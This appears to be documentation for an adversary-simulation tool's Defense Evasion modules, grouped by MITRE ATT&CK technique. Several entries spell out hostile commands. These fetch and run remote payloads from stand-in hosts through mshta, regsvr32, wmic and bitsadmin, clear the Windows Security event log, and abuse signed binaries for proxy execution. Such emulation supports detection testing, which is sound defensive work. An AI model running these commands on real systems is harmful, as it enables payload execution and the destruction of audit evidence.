Defense Evasion
T1055.002 - Process Injection: Portable Executable Injection
This module uses the CreateProcess, OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread Win32 API functions to inject an innocuous shellcode.
T1055.004 - Process Injection: Asynchronous Procedure Call
This module uses the CreateProcess, OpenProcess, VirtualAllocEx, WriteProcessMemory and QueueUserAPC Win32 API functions to inject an innocuous shellcode.
T1220 XSL - Script Processing
This module uses the CreateProcess Win32 API to execute
wmic.exe os get /FORMAT “http://webserver/payload.xsl”:
Variation 1
This module uses the System.Diagnostics .NET namespace to delete the Security Event Log.
Variation 2
This module uses the Win32 API CreateProcess to execute a specific command:
wevtutil.exe cl Security
T1218.011 - Signed Binary Proxy Execution: Rundll32
This module uses the CreateProcess Win32 API to execute
rundll32.ex C:Windowstwain_64.dll
T1218.003 - Signed Binary Proxy Execution: CMSTP
This module uses the CreateProcess Win32 API to execute
cmstp.exe /s /ns C:UsersAdministratorAppDataLocalTempXKNqbpzl.txt
T1218.005 - Signed Binary Proxy Execution: Mshta
This module uses the CreateProcess Win32 API to execute
mshta.exe http://webserver/payload.hta
T1140 - Deobfuscate/Decode Files or Information
This module uses the CreateProcess Win32 API to execute
certutil.exe -decode encodedb64.txt decoded.exe
T1218.010 - Signed Binary Proxy Execution: Regsvr32
This module uses the CreateProcess Win32 API to execute
regsvr32.exe /u /n /s /i:http://malicious.domain:8080/payload.sct scrobj.dll
T1218.009 - Signed Binary Proxy Execution: Regsvcs/Regasm
This module uses the CreateProcess Win32 API to execute
C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe /U winword.dll
T1218.004 - Signed Binary Proxy Execution: InstallUtil
This module uses the CreateProcess Win32 API to execute
C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /logfiles /LogToConsole=alse /U C:WindowsTempXKNqbpzl.exe
T1197 - BITS Jobs
This module uses the CreateProcess Win32 API to execute
bitsadmin.exe /transfer job /download /priority high http://web.evil/sc.exe C:WindowsTempwinword.exe